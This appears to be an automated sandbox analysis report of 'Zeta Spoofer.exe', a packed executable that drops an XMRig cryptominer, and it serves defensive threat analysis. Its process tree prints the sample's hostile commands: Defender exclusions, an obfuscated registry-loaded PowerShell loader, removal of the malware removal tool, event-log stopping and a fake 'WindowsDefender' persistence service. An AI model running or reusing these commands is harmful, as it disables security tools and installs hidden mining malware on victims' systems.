xmrig | 57b791d2c6eb50e566e19335af4f848a84fb0695d41afef156abccd753ba94a9

Analysis

max time kernel
150s
max time network
140s
platform
windows7_x64
resource
win7-20241023-en
resource tags

arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
submitted
02/02/2025, 18:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Zeta Spoofer.exe
Size

16.6MB
MD5

58c13144b662425b9373d0687fd6c291
SHA1

0664e627b6539d3ad79cb43d8e3131d5f3bb5b6a
SHA256

57b791d2c6eb50e566e19335af4f848a84fb0695d41afef156abccd753ba94a9
SHA512

c2534c081a34c2f825c59a926c95cdf00c1b23da2290581380c6ad1aa25523cba8e2346c0e54c2b56a7725eda862a2531828ed80edc93e37db9044c41039c960
SSDEEP

393216:5SDLxiW3R0mP1RmUh/ObTeJQlIvfcciFRM3P2lWVPNL+9m+O/:5oLRR0u1RmEOu0Ivfb3NNLz+

Score

10^/10

xmrig defense_evasion discovery execution miner persistence pyinstaller upx

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection	svchost.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2740 created 432	2740	powershell.EXE	5

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

resource	yara_rule
behavioral1/memory/2532-1038-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/2532-1039-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/2532-1036-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/2532-1035-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/2532-1040-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/2532-1042-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/2532-1041-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1788	powershell.exe
2964	powershell.exe
2740	powershell.EXE

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	ZetaSpoofer.exe
File created	C:\Windows\system32\drivers\etc\hosts	Defenderupdates.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 5 IoCs

pid	Process
2916	Zeta.exe
2840	ZetaSpoofer.exe
664	Zeta.exe
476	services.exe
2604	Defenderupdates.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Setup.evtx	svchost.exe

Loads dropped DLL 5 IoCs

pid	Process
2612	Zeta Spoofer.exe
2612	Zeta Spoofer.exe
2916	Zeta.exe
664	Zeta.exe
476	services.exe

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2948	powercfg.exe
2140	powercfg.exe
2448	powercfg.exe
2100	powercfg.exe
2468	powercfg.exe
1016	powercfg.exe
2556	powercfg.exe
2820	powercfg.exe

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	ZetaSpoofer.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\MRT.exe	Defenderupdates.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 2840 set thread context of 1484	2840	ZetaSpoofer.exe	42
PID 2604 set thread context of 2872	2604	Defenderupdates.exe	66
PID 2604 set thread context of 2944	2604	Defenderupdates.exe	72
PID 2604 set thread context of 2532	2604	Defenderupdates.exe	73
PID 2740 set thread context of 2164	2740	powershell.EXE	75

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2532-1034-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2532-1031-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2532-1032-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2532-1033-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2532-1038-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2532-1039-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2532-1036-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2532-1035-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2532-1030-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2532-1040-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2532-1042-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2532-1041-0x0000000140000000-0x0000000140835000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2412	sc.exe
2600	sc.exe
784	sc.exe
920	sc.exe

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000c00000001202c-5.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Zeta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Zeta.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 40b5d04fa175db01	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2840	ZetaSpoofer.exe
1788	powershell.exe
2840	ZetaSpoofer.exe
2840	ZetaSpoofer.exe
2840	ZetaSpoofer.exe
2840	ZetaSpoofer.exe
2840	ZetaSpoofer.exe
2840	ZetaSpoofer.exe
2840	ZetaSpoofer.exe
2840	ZetaSpoofer.exe
2840	ZetaSpoofer.exe
2840	ZetaSpoofer.exe
2604	Defenderupdates.exe
2964	powershell.exe
2740	powershell.EXE
2604	Defenderupdates.exe
2604	Defenderupdates.exe
2604	Defenderupdates.exe
2604	Defenderupdates.exe
2604	Defenderupdates.exe
2604	Defenderupdates.exe
2604	Defenderupdates.exe
2604	Defenderupdates.exe
2740	powershell.EXE
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe
2164	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1196	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	1788	powershell.exe
Token: SeShutdownPrivilege	2556	powercfg.exe
Token: SeShutdownPrivilege	1016	powercfg.exe
Token: SeShutdownPrivilege	2468	powercfg.exe
Token: SeShutdownPrivilege	2100	powercfg.exe
Token: SeDebugPrivilege	2964	powershell.exe
Token: SeDebugPrivilege	2740	powershell.EXE
Token: SeShutdownPrivilege	2448	powercfg.exe
Token: SeShutdownPrivilege	2948	powercfg.exe
Token: SeShutdownPrivilege	2140	powercfg.exe
Token: SeShutdownPrivilege	2820	powercfg.exe
Token: SeLockMemoryPrivilege	2532	dialer.exe
Token: SeDebugPrivilege	2740	powershell.EXE
Token: SeDebugPrivilege	2164	dllhost.exe
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeShutdownPrivilege	1196	Explorer.EXE

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
760	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2612 wrote to memory of 2916	2612	Zeta Spoofer.exe	30
PID 2612 wrote to memory of 2916	2612	Zeta Spoofer.exe	30
PID 2612 wrote to memory of 2916	2612	Zeta Spoofer.exe	30
PID 2612 wrote to memory of 2916	2612	Zeta Spoofer.exe	30
PID 2612 wrote to memory of 2840	2612	Zeta Spoofer.exe	31
PID 2612 wrote to memory of 2840	2612	Zeta Spoofer.exe	31
PID 2612 wrote to memory of 2840	2612	Zeta Spoofer.exe	31
PID 2916 wrote to memory of 664	2916	Zeta.exe	32
PID 2916 wrote to memory of 664	2916	Zeta.exe	32
PID 2916 wrote to memory of 664	2916	Zeta.exe	32
PID 2916 wrote to memory of 664	2916	Zeta.exe	32
PID 2840 wrote to memory of 1484	2840	ZetaSpoofer.exe	42
PID 2840 wrote to memory of 1484	2840	ZetaSpoofer.exe	42
PID 2840 wrote to memory of 1484	2840	ZetaSpoofer.exe	42
PID 2840 wrote to memory of 1484	2840	ZetaSpoofer.exe	42
PID 2840 wrote to memory of 1484	2840	ZetaSpoofer.exe	42
PID 2840 wrote to memory of 1484	2840	ZetaSpoofer.exe	42
PID 1104 wrote to memory of 1680	1104	cmd.exe	48
PID 1104 wrote to memory of 1680	1104	cmd.exe	48
PID 1104 wrote to memory of 1680	1104	cmd.exe	48
PID 1872 wrote to memory of 2740	1872	taskeng.exe	59
PID 1872 wrote to memory of 2740	1872	taskeng.exe	59
PID 1872 wrote to memory of 2740	1872	taskeng.exe	59
PID 2604 wrote to memory of 2872	2604	Defenderupdates.exe	66
PID 2604 wrote to memory of 2872	2604	Defenderupdates.exe	66
PID 2604 wrote to memory of 2872	2604	Defenderupdates.exe	66
PID 2604 wrote to memory of 2872	2604	Defenderupdates.exe	66
PID 2604 wrote to memory of 2872	2604	Defenderupdates.exe	66
PID 2604 wrote to memory of 2872	2604	Defenderupdates.exe	66
PID 2604 wrote to memory of 2944	2604	Defenderupdates.exe	72
PID 2604 wrote to memory of 2944	2604	Defenderupdates.exe	72
PID 2604 wrote to memory of 2944	2604	Defenderupdates.exe	72
PID 2604 wrote to memory of 2944	2604	Defenderupdates.exe	72
PID 2604 wrote to memory of 2944	2604	Defenderupdates.exe	72
PID 2604 wrote to memory of 2944	2604	Defenderupdates.exe	72
PID 2604 wrote to memory of 2944	2604	Defenderupdates.exe	72
PID 2604 wrote to memory of 2944	2604	Defenderupdates.exe	72
PID 2604 wrote to memory of 2944	2604	Defenderupdates.exe	72
PID 2604 wrote to memory of 2532	2604	Defenderupdates.exe	73
PID 2604 wrote to memory of 2532	2604	Defenderupdates.exe	73
PID 2604 wrote to memory of 2532	2604	Defenderupdates.exe	73
PID 2604 wrote to memory of 2532	2604	Defenderupdates.exe	73
PID 2604 wrote to memory of 2532	2604	Defenderupdates.exe	73
PID 2784 wrote to memory of 2444	2784	cmd.exe	74
PID 2784 wrote to memory of 2444	2784	cmd.exe	74
PID 2784 wrote to memory of 2444	2784	cmd.exe	74
PID 2740 wrote to memory of 2164	2740	powershell.EXE	75
PID 2740 wrote to memory of 2164	2740	powershell.EXE	75
PID 2740 wrote to memory of 2164	2740	powershell.EXE	75
PID 2740 wrote to memory of 2164	2740	powershell.EXE	75
PID 2740 wrote to memory of 2164	2740	powershell.EXE	75
PID 2740 wrote to memory of 2164	2740	powershell.EXE	75
PID 2740 wrote to memory of 2164	2740	powershell.EXE	75
PID 2740 wrote to memory of 2164	2740	powershell.EXE	75
PID 2740 wrote to memory of 2164	2740	powershell.EXE	75
PID 2164 wrote to memory of 432	2164	dllhost.exe	5
PID 2164 wrote to memory of 476	2164	dllhost.exe	6
PID 2164 wrote to memory of 492	2164	dllhost.exe	7
PID 2164 wrote to memory of 500	2164	dllhost.exe	8
PID 2164 wrote to memory of 608	2164	dllhost.exe	9
PID 2164 wrote to memory of 692	2164	dllhost.exe	10
PID 2164 wrote to memory of 760	2164	dllhost.exe	11
PID 2164 wrote to memory of 840	2164	dllhost.exe	12
PID 2164 wrote to memory of 880	2164	dllhost.exe	13

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:432
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{ca9a423c-30a4-4d41-9d38-574e46db68bb}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2164

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:476
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:608
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe
    3⤵
    PID:1520
- - C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    3⤵
    PID:1684
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:692
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  - Modifies security service
  - Indicator Removal: Clear Windows Event Logs
  - Suspicious use of UnmapMainImage
  PID:760
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:840
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1128
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  PID:880
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {4F9A0BC0-4AA2-472B-B530-DD068FCE520D} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1872
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+''+[Char](105)+'a'+[Char](108)+''+'e'+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+'a'+'ge'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2740
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:984
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:340
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1064
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:1072
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1152
- C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
  "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
  2⤵
  PID:1452
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:2276
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:2320
- C:\ProgramData\Defenderupdates.exe
  C:\ProgramData\Defenderupdates.exe
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2604
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2784
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Drops file in Windows directory
      PID:2444
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2448
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2140
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2948
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2820
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    PID:2872
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    PID:2944
- - C:\Windows\system32\dialer.exe
    dialer.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2532

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:492

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:500

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1196
- C:\Users\Admin\AppData\Local\Temp\Zeta Spoofer.exe
  "C:\Users\Admin\AppData\Local\Temp\Zeta Spoofer.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2612
- - C:\Users\Admin\AppData\Local\Temp\Zeta.exe
    "C:\Users\Admin\AppData\Local\Temp\Zeta.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2916
  - - C:\Users\Admin\AppData\Local\Temp\Zeta.exe
      "C:\Users\Admin\AppData\Local\Temp\Zeta.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:664
- - C:\Users\Admin\AppData\Local\Temp\ZetaSpoofer.exe
    "C:\Users\Admin\AppData\Local\Temp\ZetaSpoofer.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2840
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1788
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1104
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:1680
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:2556
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:1016
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:2468
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:2100
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      PID:1484
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "WindowsDefender"
      4⤵
      Launches sc.exe
      PID:784
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "WindowsDefender" binpath= "C:\ProgramData\Defenderupdates.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:920
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:2600
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "WindowsDefender"
      4⤵
      Launches sc.exe
      PID:2412

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "24338621699534604-1475907038-813239224-5736729012434387251625384420-325526944"
1⤵
PID:2384

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1237192115-14287117401215218517-85344656213212272611289441977816931871-301777549"
1⤵
PID:2792

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Zeta.exe

Filesize
11.3MB

MD5
f79df4f96e90110491b16131ad54f231

SHA1
307be8cf98adb6c2f359ffa67c8e9476febadd5a

SHA256
817967415a85915d7d4b1ac89b3f0d0ae8c1fce55cb90d20c0893e191754ea1a

SHA512
ffa198a828b57344280065036eea34e928672bbdaba6fedbf3137cd69246a265bd0fbb7803e6806e474d2c96de4dc9a9cfa0f35b617b045673759afd976ee0c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZetaSpoofer.exe

Filesize
5.3MB

MD5
7bda2ed86f648c8528531d76f0a53f2a

SHA1
5c852efdb51b00cbfa0dc0ca0d017a3f52dae069

SHA256
667849a179671c441d44de621592f75bb3a2233f3c70370122fba047720e61e2

SHA512
075d1475b87ca7b2e1096077ffa58a7dd880c2f7f9a67b5283ed14223b9fd941f9136caff782a6ca8fc0831aaccb509fe44968447d2f1dd665bbd4cd9acda356

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI29162\python39.dll

Filesize
4.2MB

MD5
2a9c5db70c6906571f2ca3a07521baa2

SHA1
765fa27bbee6a02b20b14b2b78c92a880e6627e5

SHA256
c69ce89b0487d86a63b64951207781f8051282afde67b20d3b8374c1a067f611

SHA512
fa4a677eaae2d258ac4f083a4e7009d985523b964ada93f53dc399a88c14970c7be2d2f39a7b38a922b58d134df2ede954554dcd00a4895e4273161867acac53

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1013B

MD5
27cfde53cb5a0cc9608f754760735896

SHA1
1610941c4bfff2f330eb8ae96006d8e216fc5ece

SHA256
12df6caaf3658022c70ef87f4b39ffeaf4abb6d269cd2ba12c4d354c459c7e2f

SHA512
535afd5d12005a856a44f7f7cd2a623b1c483ea4e9d63d06c610407aa45a721854c3975d4b2b4af6949d81c09151d809d521f2fe9253bf402d15869e83a6c289

Download Submit
memory/432-1067-0x0000000000C20000-0x0000000000C4B000-memory.dmp

Filesize
172KB

Download
memory/432-1060-0x0000000000C20000-0x0000000000C4B000-memory.dmp

Filesize
172KB

Download
memory/432-1059-0x0000000000BF0000-0x0000000000C15000-memory.dmp

Filesize
148KB

Download
memory/432-1057-0x0000000000BF0000-0x0000000000C15000-memory.dmp

Filesize
148KB

Download
memory/432-1061-0x0000000000C20000-0x0000000000C4B000-memory.dmp

Filesize
172KB

Download
memory/492-1075-0x0000000000200000-0x000000000022B000-memory.dmp

Filesize
172KB

Download
memory/1484-1003-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/1484-1001-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/1484-1004-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/1484-1000-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/1484-999-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/1788-996-0x000000001B6B0000-0x000000001B992000-memory.dmp

Filesize
2.9MB

Download
memory/1788-997-0x0000000001EB0000-0x0000000001EB8000-memory.dmp

Filesize
32KB

Download
memory/2164-1054-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2164-1052-0x0000000077940000-0x0000000077AE9000-memory.dmp

Filesize
1.7MB

Download
memory/2164-1049-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2164-1051-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2164-1048-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2164-1053-0x0000000077820000-0x000000007793F000-memory.dmp

Filesize
1.1MB

Download
memory/2164-1046-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2164-1047-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2532-1035-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2532-1037-0x00000000000B0000-0x00000000000D0000-memory.dmp

Filesize
128KB

Download
memory/2532-1034-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2532-1031-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2532-1032-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2532-1033-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2532-1040-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2532-1042-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2532-1038-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2532-1039-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
